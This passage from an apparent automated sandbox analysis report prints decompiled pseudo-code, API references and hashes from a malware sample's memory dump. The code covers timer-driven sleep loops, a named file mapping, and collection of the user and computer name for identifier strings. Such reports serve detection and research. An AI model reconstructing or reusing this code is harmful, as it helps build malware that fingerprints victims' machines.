						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E030850CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0308580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E030850CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x030846d1
0x030846d1
0x030846d1
0x030846da
0x030846df
0x030846e6
0x030846e8
0x030846e8
0x030846f5
0x03084700
0x03084703
0x0308470e
0x03084711
0x03084716
0x03084719
0x0308471e
0x03084721
0x0308472d
0x0308473a
0x0308473c
0x03084742
0x03084747
0x03084752
0x03084754
0x03084757
0x0308475d
0x0308475f
0x03084767
0x03084772
0x03084774
0x03084777
0x03084777
0x03084779
0x03084780
0x03084785
0x03084792
0x03084794
0x03084799
0x030847a1
0x030847a4
0x030847aa
0x030847b5
0x030847b7
0x030847bc
0x030847c1
0x030847c4
0x030847c9
0x030847d4
0x030847d6
0x030847d9
0x030847d9
0x030847db
0x030847e2
0x030847e5
0x030847ea
0x030847f4
0x030847f6
0x030847f6
0x030847f9
0x03084807
0x0308480c
0x03084810
0x03084813
0x030849dd
0x030849e5
0x030849f2
0x03084819
0x03084825
0x0308482d
0x03084830
0x030849cd
0x030849d7
0x00000000
0x030849d7
0x0308483c
0x03084841
0x0308484a
0x0308485b
0x0308485f
0x03084868
0x0308486e
0x03084876
0x0308487b
0x03084882
0x0308488b
0x03084891
0x030849bd
0x030849c7
0x00000000
0x030849c7
0x0308489d
0x030848a3
0x030848a4
0x030848ab
0x030848ae
0x030849af
0x030849b7
0x00000000
0x030849b7
0x030848b7
0x030848bd
0x030848c6
0x030848cf
0x030848da
0x030848e1
0x030848e4
0x030849f5
0x03084997
0x03084997
0x0308499c
0x030849a7
0x030849ad
0x00000000
0x030849ad
0x030848ee
0x030848f5
0x030848f8
0x030848fd
0x0308490d
0x03084910
0x03084916
0x0308491c
0x03084922
0x03084925
0x0308492b
0x0308492e
0x03084933
0x03084937
0x03084937
0x03084943
0x0308494f
0x03084953
0x03084955
0x0308495a
0x0308495c
0x03084961
0x03084966
0x03084973
0x0308497b
0x0308497e
0x0308497e
0x0308495a
0x00000000
0x03084945
0x03084949
0x03084980
0x03084983
0x0308498c
0x00000000
0x00000000
0x00000000
0x00000000
0x0308498c
0x0308494b
0x00000000
0x0308494b
0x03084943

APIs

GetTickCount.KERNEL32 ref: 030846E8
wsprintfA.USER32 ref: 03084735
wsprintfA.USER32 ref: 03084752
wsprintfA.USER32 ref: 03084772
wsprintfA.USER32 ref: 03084790
wsprintfA.USER32 ref: 030847B3
wsprintfA.USER32 ref: 030847D4
wsprintfA.USER32 ref: 030847F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03084825
GetTickCount.KERNEL32 ref: 03084836
RtlEnterCriticalSection.NTDLL(05BB95F0), ref: 0308484A
RtlLeaveCriticalSection.NTDLL(05BB95F0), ref: 03084868

Part of subcall function 0308624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,030870D9,00000000,05BB9630), ref: 03086278
Part of subcall function 0308624D: lstrlen.KERNEL32(00000000,?,00000000,030870D9,00000000,05BB9630), ref: 03086280
Part of subcall function 0308624D: strcpy.NTDLL ref: 03086297
Part of subcall function 0308624D: lstrcat.KERNEL32(00000000,00000000), ref: 030862A2
Part of subcall function 0308624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,030870D9,?,00000000,030870D9,00000000,05BB9630), ref: 030862BF

StrTrimA.SHLWAPI(00000000,030892AC,?,05BB9630), ref: 0308489D

Part of subcall function 030821C1: lstrlen.KERNEL32(05BB87FA,00000000,00000000,00000000,03087100,00000000), ref: 030821D1
Part of subcall function 030821C1: lstrlen.KERNEL32(?), ref: 030821D9
Part of subcall function 030821C1: lstrcpy.KERNEL32(00000000,05BB87FA), ref: 030821ED
Part of subcall function 030821C1: lstrcat.KERNEL32(00000000,?), ref: 030821F8

lstrcpy.KERNEL32(00000000,?), ref: 030848BD
lstrcat.KERNEL32(00000000,?), ref: 030848CF
lstrcat.KERNEL32(00000000,00000000), ref: 030848D5

Part of subcall function 03084AA6: lstrlen.KERNEL32(?,00000000,05BB9C98,7742C740,030813D0,05BB9E9D,030855DE,030855DE,?,030855DE,?,63699BC3,E8FA7DD7,00000000), ref: 03084AAD
Part of subcall function 03084AA6: mbstowcs.NTDLL ref: 03084AD6
Part of subcall function 03084AA6: memset.NTDLL ref: 03084AE8

wcstombs.NTDLL ref: 03084966

Part of subcall function 0308161A: SysAllocString.OLEAUT32(00000000), ref: 0308165B

Part of subcall function 030850CA: RtlFreeHeap.NTDLL(00000000,00000000,03084239,00000000,00000001,?,00000000,?,?,?,03086B8D,00000000,?,00000001), ref: 030850D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 030849A7
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 030849B7
RtlFreeHeap.NTDLL(00000000,00000000,?,05BB9630), ref: 030849C7
HeapFree.KERNEL32(00000000,?), ref: 030849D7
RtlFreeHeap.NTDLL(00000000,?), ref: 030849E5

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 972889839-0
Opcode ID: a904923c9405da43ca013199b2efcfe99e15c41896693ee721b6ad29bfaab13b
Instruction ID: 9f1bfd8aac914df48f6c6a50a62388f77ff7c426131f586213b8a6f5862c8540
Opcode Fuzzy Hash: a904923c9405da43ca013199b2efcfe99e15c41896693ee721b6ad29bfaab13b
Instruction Fuzzy Hash: FDA14C71602209EFCB51FF69DC88E9A7BE9EF49310B144026F989CB254DB39D911CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03082022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E03082022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x308a298);
					_v20 = 0;
					_v16 = 0;
					L03087D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x308a2c4; // 0x2dc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x308a2a4 = 5;
						} else {
							_t69 = E03081AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x308a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E03085F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E03083032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x308a29c);
							goto L21;
						} else {
							__eflags =  *0x308a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E03081492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x308a2a0);
								L21:
								L03087D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x308a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x03082022
0x03082034
0x03082037
0x03082043
0x0308204b
0x0308204e
0x030821b4
0x03082054
0x03082054
0x03082056
0x0308205b
0x0308205c
0x03082062
0x03082065
0x03082068
0x03082076
0x03082081
0x03082084
0x03082086
0x03082093
0x0308209d
0x030820a1
0x030820a4
0x030820a9
0x030820b4
0x030820b4
0x030820ab
0x030820ab
0x030820b2
0x00000000
0x00000000
0x030820b2
0x030820be
0x00000000
0x030820c1
0x030820c5
0x030820d0
0x030820d0
0x030820d7
0x030820dc
0x030820e3
0x030820ec
0x030820f2
0x030820f5
0x030820fc
0x030820ff
0x00000000
0x00000000
0x03082101
0x03082104
0x03082107
0x0308210a
0x00000000
0x0308210c
0x0308211b
0x0308211b
0x00000000
0x03082149
0x03082149
0x0308214e
0x0308216d
0x0308216f
0x03082174
0x03082175
0x00000000
0x03082150
0x03082150
0x03082156
0x00000000
0x03082158
0x03082158
0x0308215d
0x0308215f
0x03082164
0x03082165
0x0308217b
0x0308217b
0x03082183
0x0308218e
0x03082191
0x0308219c
0x0308219e
0x030821a0
0x030821a3
0x00000000
0x030821a9
0x00000000
0x030821a9
0x030821a3
0x03082156
0x00000000
0x0308214e
0x0308211e
0x03082120
0x03082123
0x03082124
0x03082124
0x03082128
0x03082132
0x03082132
0x03082138
0x0308213b
0x0308213b
0x03082141
0x03082141
0x030821be
0x00000000

APIs

memset.NTDLL ref: 03082037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03082043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03082068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 03082084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0308209D
HeapFree.KERNEL32(00000000,00000000), ref: 03082132
CloseHandle.KERNEL32(?), ref: 03082141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0308217B
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0308560C), ref: 03082191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0308219C

Part of subcall function 03081AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05BB9308,00000000,?,74B5F710,00000000,74B5F730), ref: 03081B07
Part of subcall function 03081AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05BB9340,?,00000000,30314549,00000014,004F0053,05BB92FC), ref: 03081BA4
Part of subcall function 03081AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030820B0), ref: 03081BB6

GetLastError.KERNEL32 ref: 030821AE

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 985c3c6eb8fdfb3ae3b049c6727cb5d0c972c4dee1afa23561190ad88c6cfe25
Instruction ID: 43a17ee8c673e68b675dc75ce1b15cb4fc4176b60b1534e4eddf5ca534640570
Opcode Fuzzy Hash: 985c3c6eb8fdfb3ae3b049c6727cb5d0c972c4dee1afa23561190ad88c6cfe25
Instruction Fuzzy Hash: 3B515875902228AEDF21EF98DC44DEEBFBCEF44720F244616E594E6284D7758640CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03086B0F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E03086B0F(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x308a290 = _t14;
				if(_t14 != 0) {
					 *0x308a180 = GetTickCount();
					_t16 = E03084C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L03087EEA();
						_t40 = _t18 + _t20;
						_t22 = E0308414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x308a2ac; // 0x2e0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x308a2b8 = 1; // executed
						}
					}
					_t16 = E030853F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x03086b0f
0x03086b24
0x03086b2c
0x03086b31
0x03086b44
0x03086b49
0x03086b50
0x03086bd8
0x03086bde
0x00000000
0x00000000
0x00000000
0x03086b56
0x03086b56
0x03086b5b
0x03086b61
0x03086b67
0x03086b71
0x03086b75
0x03086b76
0x03086b7b
0x03086b7c
0x03086b7d
0x03086b82
0x03086b88
0x03086b91
0x03086b97
0x03086b9d
0x03086ba2
0x03086ba9
0x03086bad
0x03086bb5
0x03086bbd
0x03086bbf
0x03086bbf
0x03086bc7
0x03086bc9
0x03086bc9
0x03086bc7
0x03086bd3
0x00000000
0x03086bd3
0x03086b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 03086B24
GetTickCount.KERNEL32 ref: 03086B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 03086B5B
SwitchToThread.KERNEL32(?,00000001), ref: 03086B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 03086B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 03086B97
IsWow64Process.KERNEL32(000002E0,?,?,00000001), ref: 03086BB5

Strings

vR, xrefs: 03086B44

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: vR
API String ID: 3690864001-405895732
Opcode ID: 34ed58a3a2b1401359d777d8ef0de9464246c9ab22d3d87f227184428402f072
Instruction ID: 48efdc908334933130e5883a1f2895316e03666126ad68e1866493271674db01
Opcode Fuzzy Hash: 34ed58a3a2b1401359d777d8ef0de9464246c9ab22d3d87f227184428402f072
Instruction Fuzzy Hash: 7721B7B2A06318AFD710FF69DC88A6A77DCEB44354F04492DF6C5C6140E779D8448F61

Uniqueness

Uniqueness Score: -1.00%

Function 03086384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03086384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L03087D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x308a2d4; // 0x2b2d5a8
				_t5 = _t13 + 0x308b8a2; // 0x5bb8e4a
				_t6 = _t13 + 0x308b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L03087A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x308a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x03086384
0x0308638c
0x03086390
0x03086396
0x0308639b
0x030863a0
0x030863a3
0x030863a6
0x030863ab
0x030863ac
0x030863af
0x030863b4
0x030863bb
0x030863c5
0x030863c7
0x030863c8
0x030863cb
0x030863e7
0x030863ed
0x030863f1
0x0308643f
0x030863f3
0x03086400
0x03086410
0x03086418
0x0308642a
0x0308642e
0x00000000
0x00000000
0x0308641a
0x0308641d
0x03086422
0x03086424
0x03086424
0x03086402
0x03086404
0x03086430
0x03086431
0x03086431
0x03086400
0x03086446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,03085488,?,00000001,?), ref: 03086390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 030863A6
_snwprintf.NTDLL ref: 030863CB
CreateFileMappingW.KERNELBASE(000000FF,0308A2F8,00000004,00000000,00001000,?), ref: 030863E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,03085488,?), ref: 030863F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 03086410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,03085488), ref: 03086431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,03085488,?), ref: 03086439

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: a8d62171a7c394a761ac3e0928a837487c0cedc81709a5e50f1478e7a9b79ce6
Instruction ID: cccd0d1c13306ec6b80aa69bf96dcb888b8887c2a0874db8e392c0e645ec829c
Opcode Fuzzy Hash: a8d62171a7c394a761ac3e0928a837487c0cedc81709a5e50f1478e7a9b79ce6
Instruction Fuzzy Hash: 4A21D272603218FFC721FBA8DC05FEE77B9AB84750F254121FA86EB280DB7195018B61

Uniqueness

Uniqueness Score: -1.00%

Function 030853F2, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E030853F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E030858F8();
				if(_t27 != 0) {
					_t77 =  *0x308a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x308a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x308a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0308696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x308a2d4; // 0x2b2d5a8
					_push(0x308a2fc);
					_push(1);
					_t7 = _t32 + 0x308b5ad; // 0x4d283a53
					 *0x308a2f8 = 0xc;
					 *0x308a300 = 0;
					L03084AF8();
					_t36 = E03086384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E03084454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E03086837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x308a2d4; // 0x2b2d5a8
								_t18 = _t64 + 0x308b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x308a32c = _t87;
						}
						_t38 = E030860E1();
						 *0x308a2c8 =  *0x308a2c8 ^ 0xe8fa7dd7;
						 *0x308a31c = _t38;
						_t39 = E03086837(0x60);
						__eflags = _t39;
						 *0x308a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x308a37c; // 0x5bb9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x308a37c; // 0x5bb9630
							 *_t56 = 0x308b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x308a290, _t84, 0x43);
							__eflags = _t42;
							 *0x308a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x308a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x308a2d4; // 0x2b2d5a8
								_t19 = _t76 + 0x308b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x30892a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E03084454( ~_v8 &  *0x308a2c8, 0x308a00c); // executed
								_t84 = E03082206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E03081376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E03082022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E03082439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x308a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E03086BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x030853f2
0x030853fd
0x03085400
0x03085403
0x03085406
0x0308540d
0x0308540f
0x0308541b
0x0308541d
0x0308541d
0x03085426
0x0308542e
0x03085431
0x0308544b
0x03085450
0x03085451
0x03085453
0x03085458
0x0308545d
0x0308545f
0x03085466
0x03085470
0x03085476
0x03085483
0x0308548a
0x0308548f
0x0308548f
0x03085498
0x030854c1
0x030854c4
0x030854d1
0x030854d8
0x030854e4
0x030854e6
0x030854e8
0x030854ed
0x030854f3
0x030854f9
0x030854ff
0x03085502
0x03085507
0x0308550f
0x03085511
0x03085511
0x03085514
0x03085514
0x0308551a
0x0308551f
0x03085527
0x0308552c
0x03085531
0x03085533
0x03085538
0x03085567
0x0308553a
0x0308553f
0x03085544
0x03085549
0x03085550
0x03085556
0x0308555b
0x03085561
0x03085561
0x03085568
0x0308556a
0x03085579
0x0308557f
0x03085581
0x03085586
0x030855b2
0x03085588
0x03085588
0x0308558e
0x0308559b
0x030855a1
0x030855a1
0x030855a9
0x030855ab
0x030855b3
0x030855b5
0x030855bc
0x030855c9
0x030855d3
0x030855d5
0x030855d7
0x00000000
0x00000000
0x030855d9
0x030855de
0x030855e0
0x030855e7
0x030855eb
0x030855ee
0x03085603
0x03085607
0x0308560c
0x00000000
0x0308560c
0x030855f0
0x030855f2
0x00000000
0x00000000
0x030855f4
0x030855fd
0x030855ff
0x03085601
0x00000000
0x00000000
0x00000000
0x03085601
0x030855e4
0x030855e4
0x030855b5
0x0308549a
0x0308549a
0x0308549f
0x0308560e
0x03085612
0x0308561a
0x0308561a
0x00000000
0x03085612
0x030854a5
0x030854a8
0x030854a8
0x030854aa
0x030854ad
0x030854b5
0x030854bc
0x00000000
0x03085622
0x03085622
0x03085625
0x0308562a
0x0308562a

APIs

Part of subcall function 030858F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0308540B,00000000,00000000,00000000,?,?,?,?,?,03086BD8,?,00000001), ref: 03085907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0308A2FC,00000000), ref: 03085476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,03086BD8,?,00000001), ref: 0308548F
wsprintfA.USER32 ref: 0308550F
memset.NTDLL ref: 0308553F
RtlInitializeCriticalSection.NTDLL(05BB95F0), ref: 03085550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 03085579
wsprintfA.USER32 ref: 030855A9

Part of subcall function 03084454: GetUserNameW.ADVAPI32(00000000,030855CE), ref: 0308448B
Part of subcall function 03084454: RtlAllocateHeap.NTDLL(00000000,030855CE), ref: 030844A2
Part of subcall function 03084454: GetUserNameW.ADVAPI32(00000000,030855CE), ref: 030844AF
Part of subcall function 03084454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,030855CE,?,?,?,?,?,03086BD8,?,00000001), ref: 030844D0
Part of subcall function 03084454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 030844F7
Part of subcall function 03084454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0308450B
Part of subcall function 03084454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 03084518
Part of subcall function 03084454: HeapFree.KERNEL32(00000000,00000000), ref: 03084536

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

